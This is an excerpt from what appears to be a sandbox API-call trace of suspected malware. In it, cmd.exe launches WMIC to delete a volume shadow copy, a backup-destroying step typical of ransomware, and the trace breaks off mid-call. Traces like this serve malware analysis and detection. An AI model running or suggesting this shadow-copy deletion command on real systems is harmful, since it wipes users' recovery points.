[0108.508] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0108.508] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0108.508] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0108.508] GetProcessHeap () returned 0x1f0000 [0108.508] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1f0000) returned 1 [0108.508] GetEnvironmentStringsW () returned 0x208b90* [0108.508] GetProcessHeap () returned 0x1f0000 [0108.508] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa94) returned 0x20ad60 [0108.508] FreeEnvironmentStringsW (penv=0x208b90) returned 1 [0108.508] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0108.508] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0108.508] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0108.509] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0108.509] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0108.509] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0108.509] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0108.509] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0108.509] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0108.509] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0108.509] GetProcessHeap () returned 0x1f0000 [0108.509] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x5c) returned 0x20b800 [0108.509] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f910 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0108.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x18f910, lpFilePart=0x18f8f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18f8f0*="Desktop") returned 0x25 [0108.509] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0108.509] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f620 | out: lpFindFileData=0x18f620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x20b870 [0108.509] FindClose (in: hFindFile=0x20b870 | out: hFindFile=0x20b870) returned 1 [0108.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x18f620 | out: lpFindFileData=0x18f620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x20b870 [0108.510] FindClose (in: hFindFile=0x20b870 | out: hFindFile=0x20b870) returned 1 [0108.510] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0108.510] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x18f620 | out: lpFindFileData=0x18f620*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x20b870 [0108.510] FindClose (in: hFindFile=0x20b870 | out: hFindFile=0x20b870) returned 1 [0108.510] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0108.510] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0108.510] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0108.510] GetProcessHeap () returned 0x1f0000 [0108.510] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ad60 | out: hHeap=0x1f0000) returned 1 [0108.510] GetEnvironmentStringsW () returned 0x20b870* [0108.510] GetProcessHeap () returned 0x1f0000 [0108.510] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xae8) returned 0x20c360 [0108.511] FreeEnvironmentStringsW (penv=0x20b870) returned 1 [0108.511] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a7fc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0108.511] GetProcessHeap () returned 0x1f0000 [0108.511] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b800 | out: hHeap=0x1f0000) returned 1 [0108.511] GetProcessHeap () returned 0x1f0000 [0108.511] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4016) returned 0x20ce50 [0108.511] GetProcessHeap () returned 0x1f0000 [0108.511] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe4) returned 0x209680 [0108.511] GetProcessHeap () returned 0x1f0000 [0108.511] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ce50 | out: hHeap=0x1f0000) returned 1 [0108.511] GetConsoleOutputCP () returned 0x1b5 [0108.512] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7fbfe0 | out: lpCPInfo=0x4a7fbfe0) returned 1 [0108.512] GetUserDefaultLCID () returned 0x409 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a7f7b50, cchData=8 | out: lpLCData=":") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa20, cchData=128 | out: lpLCData="0") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa20, cchData=128 | out: lpLCData="0") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa20, cchData=128 | out: lpLCData="1") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a80a740, cchData=8 | out: lpLCData="/") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a80a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a80a460, cchData=32 | out: lpLCData="Tue") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a80a420, cchData=32 | out: lpLCData="Wed") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a80a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a80a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a80a360, cchData=32 | out: lpLCData="Sat") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a80a700, cchData=32 | out: lpLCData="Sun") returned 4 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a7f7b40, cchData=8 | out: lpLCData=".") returned 2 [0108.513] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a80a4e0, cchData=8 | out: lpLCData=",") returned 2 [0108.513] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0108.514] GetProcessHeap () returned 0x1f0000 [0108.514] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x20c) returned 0x2097e0 [0108.514] GetConsoleTitleW (in: lpConsoleTitle=0x2097e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0108.514] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0108.514] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0108.515] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0108.515] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0108.515] GetProcessHeap () returned 0x1f0000 [0108.515] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4012) returned 0x20ce50 [0108.515] GetProcessHeap () returned 0x1f0000 [0108.515] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ce50 | out: hHeap=0x1f0000) returned 1 [0108.518] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0108.518] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0108.518] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0108.518] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0108.518] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0108.518] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0108.518] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0108.518] GetProcessHeap () returned 0x1f0000 [0108.518] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0) returned 0x209a00 [0108.518] GetProcessHeap () returned 0x1f0000 [0108.518] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x54) returned 0x209ac0 [0108.521] GetProcessHeap () returned 0x1f0000 [0108.521] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x9e) returned 0x209b20 [0108.522] GetConsoleTitleW (in: lpConsoleTitle=0x18f930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0108.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.522] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.522] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f4c0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f4a0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f4a0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0108.522] GetProcessHeap () returned 0x1f0000 [0108.522] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x209bd0 [0108.522] GetProcessHeap () returned 0x1f0000 [0108.522] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe2) returned 0x209df0 [0108.523] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0108.523] GetProcessHeap () returned 0x1f0000 [0108.523] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x420) returned 0x1f1320 [0108.523] SetErrorMode (uMode=0x0) returned 0x8001 [0108.523] SetErrorMode (uMode=0x1) returned 0x0 [0108.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x1f1330, lpFilePart=0x18f1c0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x18f1c0*="wbem") returned 0x18 [0108.523] SetErrorMode (uMode=0x8001) returned 0x1 [0108.523] GetProcessHeap () returned 0x1f0000 [0108.523] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x1f1320, Size=0x54) returned 0x1f1320 [0108.523] GetProcessHeap () returned 0x1f0000 [0108.523] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x1f1320) returned 0x54 [0108.523] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0108.523] GetProcessHeap () returned 0x1f0000 [0108.523] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x48) returned 0x209ee0 [0108.523] GetProcessHeap () returned 0x1f0000 [0108.524] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x7c) returned 0x209f30 [0108.524] GetProcessHeap () returned 0x1f0000 [0108.524] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209f30, Size=0x48) returned 0x209f30 [0108.524] GetProcessHeap () returned 0x1f0000 [0108.524] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209f30) returned 0x48 [0108.524] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a7ef360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0108.524] GetProcessHeap () returned 0x1f0000 [0108.524] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe8) returned 0x209f90 [0108.528] GetProcessHeap () returned 0x1f0000 [0108.528] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209f90, Size=0x7e) returned 0x209f90 [0108.528] GetProcessHeap () returned 0x1f0000 [0108.528] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209f90) returned 0x7e [0108.529] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0108.530] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0x20a020 [0108.530] GetProcessHeap () returned 0x1f0000 [0108.530] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x28) returned 0x2046c0 [0108.530] FindClose (in: hFindFile=0x20a020 | out: hFindFile=0x20a020) returned 1 [0108.530] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0108.530] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0108.530] GetConsoleTitleW (in: lpConsoleTitle=0x18f480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0108.530] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f238, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f1f8 | out: lpAttributeList=0x18f238, lpSize=0x18f1f8) returned 1 [0108.530] UpdateProcThreadAttribute (in: lpAttributeList=0x18f238, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f1e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f238, lpPreviousValue=0x0) returned 1 [0108.530] GetStartupInfoW (in: lpStartupInfo=0x18f350 | out: lpStartupInfo=0x18f350*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0108.531] GetProcessHeap () returned 0x1f0000 [0108.531] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x20) returned 0x2046f0 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.531] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0108.532] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0108.532] GetProcessHeap () returned 0x1f0000 [0108.532] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x2046f0 | out: hHeap=0x1f0000) returned 1 [0108.532] GetProcessHeap () returned 0x1f0000 [0108.532] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x12) returned 0x208a30 [0108.532] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0108.533] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f270*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f220 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete", lpProcessInformation=0x18f220*(hProcess=0x54, hThread=0x50, dwProcessId=0x318, dwThreadId=0x8ac)) returned 1 [0108.538] CloseHandle (hObject=0x50) returned 1 [0108.538] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0108.538] GetProcessHeap () returned 0x1f0000 [0108.538] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20c360 | out: hHeap=0x1f0000) returned 1 [0108.538] GetEnvironmentStringsW () returned 0x20ad60* [0108.538] GetProcessHeap () returned 0x1f0000 [0108.538] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xae8) returned 0x20b850 [0108.538] FreeEnvironmentStringsW (penv=0x20ad60) returned 1 [0108.538] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0111.396] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18f168 | out: lpExitCode=0x18f168*=0x0) returned 1 [0111.396] CloseHandle (hObject=0x54) returned 1 [0111.396] _vsnwprintf (in: _Buffer=0x18f3d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f178 | out: _Buffer="00000000") returned 8 [0111.396] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0111.396] GetProcessHeap () returned 0x1f0000 [0111.396] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b850 | out: hHeap=0x1f0000) returned 1 [0111.396] GetEnvironmentStringsW () returned 0x20ad60* [0111.396] GetProcessHeap () returned 0x1f0000 [0111.396] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0e) returned 0x20b880 [0111.396] FreeEnvironmentStringsW (penv=0x20ad60) returned 1 [0111.396] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0111.396] GetProcessHeap () returned 0x1f0000 [0111.396] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20b880 | out: hHeap=0x1f0000) returned 1 [0111.396] GetEnvironmentStringsW () returned 0x20ad60* [0111.396] GetProcessHeap () returned 0x1f0000 [0111.396] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0e) returned 0x20b880 [0111.396] FreeEnvironmentStringsW (penv=0x20ad60) returned 1 [0111.396] GetProcessHeap () returned 0x1f0000 [0111.397] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x208a30 | out: hHeap=0x1f0000) returned 1 [0111.397] DeleteProcThreadAttributeList (in: lpAttributeList=0x18f238 | out: lpAttributeList=0x18f238) [0111.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.397] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7ee194 | out: lpMode=0x4a7ee194) returned 1 [0111.397] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.397] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7ee198 | out: lpMode=0x4a7ee198) returned 1 [0111.397] SetConsoleInputExeNameW () returned 0x1 [0111.397] GetConsoleOutputCP () returned 0x1b5 [0111.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7fbfe0 | out: lpCPInfo=0x4a7fbfe0) returned 1 [0111.398] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0111.398] exit (_Code=0) Process: id = "35" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1e7b8000" os_pid = "0x318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x87c" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 201 os_tid = 0x8ac [0108.581] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10fb30 | out: lpSystemTimeAsFileTime=0x10fb30*(dwLowDateTime=0x48484350, dwHighDateTime=0x1d68245)) [0108.581] GetCurrentProcessId () returned 0x318 [0108.581] GetCurrentThreadId () returned 0x8ac [0108.581] GetTickCount () returned 0x1150cae [0108.581] QueryPerformanceCounter (in: lpPerformanceCount=0x10fb38 | out: lpPerformanceCount=0x10fb38*=22847383857) returned 1 [0108.585] GetModuleHandleW (lpModuleName=0x0) returned 0xffc30000 [0108.585] __set_app_type (_Type=0x1) [0108.585] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffc7ced0) returned 0x0 [0108.585] __wgetmainargs (in: _Argc=0xffca2380, _Argv=0xffca2390, _Env=0xffca2388, _DoWildCard=0, _StartInfo=0xffca239c | out: _Argc=0xffca2380, _Argv=0xffca2390, _Env=0xffca2388) returned 0 [0108.586] ??0CHString@@QEAA@XZ () returned 0xffca2ab0 [0108.586] malloc (_Size=0x30) returned 0x465a50 [0108.586] malloc (_Size=0x70) returned 0x465a90 [0108.586] malloc (_Size=0x50) returned 0x467d30 [0108.586] malloc (_Size=0x30) returned 0x467d90 [0108.586] malloc (_Size=0x48) returned 0x467dd0 [0108.586] malloc (_Size=0x30) returned 0x467e20 [0108.586] malloc (_Size=0x30) returned 0x467e60 [0108.586] ??0CHString@@QEAA@XZ () returned 0xffca2f58 [0108.586] malloc (_Size=0x30) returned 0x467ea0 [0108.586] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0108.586] SetConsoleCtrlHandler (HandlerRoutine=0xffc75724, Add=1) returned 1 [0108.586] _onexit (_Func=0xffc8f378) returned 0xffc8f378 [0108.587] _onexit (_Func=0xffc8f490) returned 0xffc8f490 [0108.587] _onexit (_Func=0xffc8f4d0) returned 0xffc8f4d0 [0108.587] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0108.587] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0108.591] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, 